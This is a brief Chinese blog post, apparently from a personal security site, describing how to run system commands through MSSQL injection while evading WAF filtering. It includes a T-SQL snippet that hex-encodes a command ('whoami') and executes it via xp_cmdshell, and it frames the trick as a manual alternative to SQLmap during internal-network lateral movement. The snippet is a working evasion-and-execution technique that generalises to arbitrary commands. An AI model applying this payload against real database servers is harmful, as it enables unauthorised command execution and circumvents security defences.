MSSQL注入命令绕过

在mssql注入中，SQLmap会使用16进制进行xp_cmdshell命令执行，使用该方法可以绕过一定的WAF防护。

在内网横向时，SQLmap无法同时使用-d和--proxy命令，所以仍需手动命令执行，如果mssql机器上存在WAF等安全设备，即可使用该方法绕过，以执行命令.

DECLARE @abc VARCHAR(8000);
/* 0x77686f616d69的16进制解码为whoami */
SET @abc=0x77686f616d69;
exec master..xp_cmdshell @abc;

《MSSQL注入命令绕过》链接：https://xdym11235.com/archives/237.html
具体版权规定详见侧栏版权说明页面